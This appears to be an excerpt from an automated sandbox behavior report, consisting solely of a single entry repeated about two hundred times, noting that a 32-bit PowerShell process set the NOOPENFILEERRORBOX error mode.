    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
